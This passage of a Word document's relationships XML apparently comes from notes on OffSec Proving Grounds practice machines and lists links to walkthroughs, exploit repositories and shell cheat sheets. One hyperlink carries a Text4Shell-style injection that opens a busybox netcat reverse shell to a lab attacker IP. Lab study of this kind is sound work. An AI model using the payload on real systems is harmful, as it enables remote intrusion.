Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image241.png"/><Relationship Id="rId614" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackmd.io/@rudefish/offsec-pg-funboxrookie-easy" TargetMode="External"/><Relationship Id="rId856" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@z6157881/cybersploit-1-vulnhub-walkthrough-8537c7b71dcf" TargetMode="External"/><Relationship Id="rId851" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@huwanyu94/proving-grounds-practice-hepet-walkthrough-ee7e051af47b" TargetMode="External"/><Relationship Id="rId850" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://freedium.cfd/https://medium.com/@huwanyu94/proving-grounds-practice-hepet-walkthrough-ee7e051af47b" TargetMode="External"/><Relationship Id="rId1200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osintteam.blog/proving-grounds-sunsetdecoy-walkthrough-28108bcaecd9" TargetMode="External"/><Relationship Id="rId1201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@hamzamalick72/sunsetnoontide-walkthrough-offsec-proving-ground-vulnhub-c378a31f6a5c" TargetMode="External"/><Relationship Id="rId1235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image158.png"/><Relationship Id="rId1236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image223.png"/><Relationship Id="rId1237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/b4ny4n/CVE-2020-13151" TargetMode="External"/><Relationship Id="rId1238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.117.150:8080/search?query=helloworld" TargetMode="External"/><Relationship Id="rId1239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.117.150:8080/search?query=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27busybox%20nc%20192.168.45.232%204444%20-e%20sh%27%29%7D" TargetMode="External"/><Relationship Id="rId409" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image516.png"/><Relationship Id="rId404" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/peass-ng/PEASS-ng/releases" TargetMode="External"/><Relationship Id="rId646" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image240.png"/><Relationship Id="rId888" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image239.png"/><Relationship Id="rId403" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS" TargetMode="External"/><Relationship Id="rId645" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image429.png"/><Relationship Id="rId887" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image376.png"/><Relationship Id="rId402" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS" TargetMode="External"/><Relationship Id="rId644" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image499.png"/><Relationship Id="rId886" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image374.png"/><Relationship Id="rId401" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/rebootuser/LinEnum" TargetMode="External"/><Relationship Id="rId643" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image62.png"/><Relationship Id="rId885" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Cron" TargetMode="External"/><Relationship Id="rId408" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image258.png"/><Relationship Id="rId407" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image355.png"/><Relationship Id="rId649" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image413.png"/><Relationship Id="rId406" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image172.png"/><Relationship Id="rId648" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://systemweakness.com/dc-4-vulnhub-98d97fb0fea4" TargetMode="External"/><Relationship Id="rId405" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image259.png"/><Relationship Id="rId647" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId889" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Cron" TargetMode="External"/><Relationship Id="rId880" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image144.png"/><Relationship Id="rId1230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image289.png"/><Relationship Id="rId400" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/rebootuser/LinEnum" TargetMode="External"/><Relationship Id="rId642" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image179.png"/><Relationship Id="rId884" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Cron" TargetMode="External"/><Relationship Id="rId1231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image67.png"/><Relationship Id="rId641" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://software-sinner.medium.com/offensive-security-proving-grounds-ha-natraj-e11c8053d7cb" TargetMode="External"/><Relationship Id="rId883" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image111.png"/><Relationship Id="rId1232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/49067" TargetMode="External"/><Relationship Id="rId640" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image492.png"/><Relationship Id="rId882" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image489.png"/><Relationship Id="rId1233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/49067" TargetMode="External"/><Relationship Id="rId881" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image455.png"/><Relationship Id="rId1234" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image103.png"/><Relationship Id="rId1224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/KryoCeph/Mobile-Mouse-3.6.0.4-Exploit" TargetMode="External"/><Relationship Id="rId1225" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/KryoCeph/Mobile-Mouse-3.6.0.4-Exploit" TargetMode="External"/><Relationship Id="rId1226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.183.143:80/FUZZ" TargetMode="External"/><Relationship Id="rId1227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.183.143:80/FUZZ" TargetMode="External"/><Relationship Id="rId1228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.183.143:80/api/FUZZ%20-w%20/usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-words.txt" TargetMode="External"/><Relationship Id="rId1229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.183.143:80/api/FUZZ%20-w%20/usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-words.txt" TargetMode="External"/><Relationship Id="rId635" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image293.png"/><Relationship Id="rId877" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://packages.debian.org/sid/iptables-persistent" TargetMode="External"/><Relationship Id="rId634" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/linux/peppo" TargetMode="External"/><Relationship Id="rId876" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://packages.debian.org/sid/iptables-persistent" TargetMode="External"/><Relationship Id="rId633" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image442.png"/><Relationship Id="rId875" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://linux.die.net/man/8/iptables" TargetMode="External"/><Relationship Id="rId632" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hackingarticles.in/lxd-privilege-escalation/" TargetMode="External"/><Relationship Id="rId874" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://linux.die.net/man/8/iptables" TargetMode="External"/><Relationship Id="rId639" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gtfobins.github.io/" TargetMode="External"/><Relationship Id="rId638" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.google.com/document/d/12DXL3Nczy0m3E8wH0nIzTWTMNUeCWNXsjHCMxse9w3Q/edit?usp=sharing" TargetMode="External"/><Relationship Id="rId637" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image475.png"/><Relationship Id="rId879" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.netfilter.org/" TargetMode="External"/><Relationship Id="rId636" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@barrattjack89/pg-play-pwned1-walkthrough-651ce326d091" TargetMode="External"/><Relationship Id="rId878" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.netfilter.org/" TargetMode="External"/><Relationship Id="rId631" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hackingarticles.in/lxd-privilege-escalation/" TargetMode="External"/><Relationship Id="rId873" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image322.png"/><Relationship Id="rId1220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ardian.danny/oscp-practice-series-24-proving-grounds-internal-5e0b8d368c62" TargetMode="External"/><Relationship Id="rId630" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://angelica.gitbook.io/hacktricks/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation" TargetMode="External"/><Relationship Id="rId872" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ardian.danny/oscp-practice-series-72-proving-grounds-sybaris-b362f337365c" TargetMode="External"/><Relationship Id="rId1221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@huntersherlock11/mice-proving-ground-walk-through-9f12f938920a" TargetMode="External"/><Relationship Id="rId871" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@vivek-kumar/offensive-security-proving-grounds-walk-through-sybaris-491b23545014" TargetMode="External"/><Relationship Id="rId1222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/p0dalirius/RemoteMouse-3.008-Exploit" TargetMode="External"/><Relationship Id="rId870" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/n0b0dyCN/redis-rogue-server" TargetMode="External"/><Relationship Id="rId1223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image195.png"/><Relationship Id="rId829" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.pcmag.com/encyclopedia/term/smtp" TargetMode="External"/><Relationship Id="rId828" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@whitebearr82/pgpractice-linux-postfish-192-168-56-137-9a48d8577c5f" TargetMode="External"/><Relationship Id="rId827" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@whitebearr82/pgpractice-linux-postfish-192-168-56-137-9a48d8577c5f" TargetMode="External"/><Relationship Id="rId822" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image436.png"/><Relationship Id="rId821" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@huwanyu94/proving-grounds-practice-hepet-walkthrough-ee7e051af47b" TargetMode="External"/><Relationship Id="rId820" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://freedium.cfd/https://medium.com/@huwanyu94/proving-grounds-practice-hepet-walkthrough-ee7e051af47b" TargetMode="External"/><Relationship Id="rId826" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://banua.medium.com/proving-grounds-hepet-oscp-prep-2025-practice-17-3bdc3ad86495" TargetMode="External"/><Relationship Id="rId825" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@whitebearr82/pgpractice-linux-postfish-192-168-56-137-9a48d8577c5f" TargetMode="External"/><Relationship Id="rId824" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:it@postfish.off" TargetMode="External"/><Relationship Id="rId823" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:it@postfish.off" TargetMode="External"/><Relationship Id="rId819" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/0bfxgh0st/MMG-LO/" TargetMode="External"/><Relationship Id="rId818" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://banua.medium.com/proving-grounds-hepet-oscp-prep-2025-practice-17-3bdc3ad86495" TargetMode="External"/><Relationship Id="rId817" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image251.png"/><Relationship Id="rId816" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image462.png"/><Relationship Id="rId811" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image309.png"/><Relationship Id="rId810" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@MEGAZORDI/oscp-practice-proving-grounds-fired-99745bfe2977" TargetMode="External"/><Relationship Id="rId815" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image282.png"/><Relationship Id="rId814" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:jim@relia.com" TargetMode="External"/><Relationship Id="rId813" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image346.png"/><Relationship Id="rId812" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image458.png"/><Relationship Id="rId609" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hashes.com/en/tools/hash_identifier" TargetMode="External"/><Relationship Id="rId608" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image279.png"/><Relationship Id="rId607" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/file-upload/alt-extensions-php.txt" TargetMode="External"/><Relationship Id="rId849" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image150.png"/><Relationship Id="rId602" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Bourne_shell" TargetMode="External"/><Relationship Id="rId844" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://banua.medium.com/proving-grounds-hepet-oscp-prep-2025-practice-17-3bdc3ad86495" TargetMode="External"/><Relationship Id="rId601" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#bash-tcp" TargetMode="External"/><Relationship Id="rId843" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@whitebearr82/pgpractice-linux-postfish-192-168-56-137-9a48d8577c5f" TargetMode="External"/><Relationship Id="rId600" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#bash-tcp" TargetMode="External"/><Relationship Id="rId842" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@whitebearr82/pgpractice-linux-postfish-192-168-56-137-9a48d8577c5f" TargetMode="External"/><Relationship Id="rId841" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:it@postfish.off" TargetMode="External"/><Relationship Id="rId606" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/file-upload/alt-extensions-php.txt" TargetMode="External"/><Relationship Id="rId848" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image210.png"/><Relationship Id="rId605" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image159.png"/><Relationship Id="rId847" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image532.png"/><Relationship Id="rId604" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image332.png"/><Relationship Id="rId846" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image354.png"/><Relationship Id="rId603" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Bourne_shell" TargetMode="External"/><Relationship Id="rId845" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId840" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:it@postfish.off" TargetMode="External"/><Relationship Id="rId839" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image373.png"/><Relationship Id="rId838" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image513.png"/><Relationship Id="rId833" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://mailtrap.io/blog/smtp-commands-and-responses/" TargetMode="External"/><Relationship Id="rId832" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://mailtrap.io/blog/smtp-commands-and-responses/" TargetMode="External"/><Relationship Id="rId831" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image115.png"/><Relationship Id="rId830" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.pcmag.com/encyclopedia/term/smtp" TargetMode="External"/><Relationship Id="rId837" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@whitebearr82/pgpractice-linux-postfish-192-168-56-137-9a48d8577c5f" TargetMode="External"/><Relationship Id="rId836" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:it@postfish.off" TargetMode="External"/><Relationship Id="rId835" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:it@postfish.off" TargetMode="External"/><Relationship Id="rId834" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image182.png"/><Relationship Id="rId1059" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image65.png"/><Relationship Id="rId228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image168.png"/><Relationship Id="rId227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/jpillora/chisel/blob/5ad1141361e10c4eb058ee8e7a87d2e481e17929/.github/workflows/ci.yml#L13" TargetMode="External"/><Relationship Id="rId469" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image327.png"/><Relationship Id="rId226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/jpillora/chisel/blob/5ad1141361e10c4eb058ee8e7a87d2e481e17929/.github/workflows/ci.yml#L13" TargetMode="External"/><Relationship Id="rId468" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/MD5" TargetMode="External"/><Relationship Id="rId225" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/GoogleContainerTools/distroless/issues/1342" TargetMode="External"/><Relationship Id="rId467" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/MD5" TargetMode="External"/><Relationship Id="rId1290" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cyberarri.com/2024/06/09/monitoring-pg-play-writeup/" TargetMode="External"/><Relationship Id="rId1291" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/hadrian3689/nagiosxi_5.6.6/blob/main/exploit.py" TargetMode="External"/><Relationship Id="rId229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://notes.benheater.com/books/network-pivoting/page/port-forwarding-with-chisel" TargetMode="External"/><Relationship Id="rId1050" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/burp" TargetMode="External"/><Relationship Id="rId1292" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ahoner.medium.com/pg-photographer-walkthrough-offensive-security-proving-grounds-play-boxes-567eaebecbef" TargetMode="External"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image328.png"/><Relationship Id="rId462" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image116.png"/><Relationship Id="rId1051" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/network-services-pentesting/3128-pentesting-squid" TargetMode="External"/><Relationship Id="rId1293" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@anushka18599/offsec-proving-grounds-walkthrough-monster-774a871c6ad7" TargetMode="External"/><Relationship Id="rId461" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image527.png"/><Relationship Id="rId1052" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image494.png"/><Relationship Id="rId1294" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@vivek-kumar/offensive-security-proving-grounds-walk-through-monster-59a4a4283449" TargetMode="External"/><Relationship Id="rId460" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image213.png"/><Relationship Id="rId1053" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image59.png"/><Relationship Id="rId1295" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://abdilahrf.github.io/cve/login-rate-limiting-bypass" TargetMode="External"/><Relationship Id="rId1054" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image369.png"/><Relationship Id="rId1296" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@anushka18599/offsec-proving-grounds-walkthrough-monster-774a871c6ad7" TargetMode="External"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/golang/go/issues/58550" TargetMode="External"/><Relationship Id="rId466" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image526.png"/><Relationship Id="rId1055" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://getfoxyproxy.org/" TargetMode="External"/><Relationship Id="rId1297" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@d3mi/vegeta1-offsec-proving-grounds-acd77f1b5b61" TargetMode="External"/><Relationship Id="rId223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image222.png"/><Relationship Id="rId465" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image450.png"/><Relationship Id="rId1056" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://getfoxyproxy.org/" TargetMode="External"/><Relationship Id="rId1298" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@huwanyu94/proving-grounds-play-sosimple-walkthrough-18bc36ab859e" TargetMode="External"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.gnu.org/software/libc/" TargetMode="External"/><Relationship Id="rId464" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dev.mysql.com/doc/refman/8.0/en/information-schema-introduction.html" TargetMode="External"/><Relationship Id="rId1057" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image118.png"/><Relationship Id="rId1299" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wpscan.com/vulnerability/7b412469-cc03-4899-b397-38580ced5618/" TargetMode="External"/><Relationship Id="rId221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.gnu.org/software/libc/" TargetMode="External"/><Relationship Id="rId463" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dev.mysql.com/doc/refman/8.0/en/information-schema-introduction.html" TargetMode="External"/><Relationship Id="rId1058" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image224.png"/><Relationship Id="rId1048" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Dpsypher/proving-grounds-practice-squid-1bc1e2dbb8d4" TargetMode="External"/><Relationship Id="rId1049" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/burp" TargetMode="External"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nmap.org/ncat/" TargetMode="External"/><Relationship Id="rId459" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image482.png"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://man.openbsd.org/ssh_config#ProxyCommand" TargetMode="External"/><Relationship Id="rId458" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image157.png"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://man.openbsd.org/ssh_config#ProxyCommand" TargetMode="External"/><Relationship Id="rId457" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/sql/sql_like.asp" TargetMode="External"/><Relationship Id="rId699" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nongiach/sudo_inject" TargetMode="External"/><Relationship Id="rId214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://man.openbsd.org/ssh_config#ProxyCommand" TargetMode="External"/><Relationship Id="rId456" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/sql/sql_like.asp" TargetMode="External"/><Relationship Id="rId698" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sanaullahamankorai.medium.com/proving-ground-play-seppuku-walkthrough-c0de8e79688d" TargetMode="External"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image286.png"/><Relationship Id="rId1280" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image110.png"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nmap.org/ncat/" TargetMode="External"/><Relationship Id="rId1281" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hacktricks.boitatech.com.br/linux-unix/privilege-escalation/interesting-groups-linux-pe#disk-group" TargetMode="External"/><Relationship Id="rId451" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image356.png"/><Relationship Id="rId693" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.png"/><Relationship Id="rId1040" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.revshells.com/" TargetMode="External"/><Relationship Id="rId1282" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@0xrave/ctf-200-02-offsec-proving-grounds-practice-labor-day-ctf-machine-walkthrough-78a5497ce589" TargetMode="External"/><Relationship Id="rId450" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId692" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 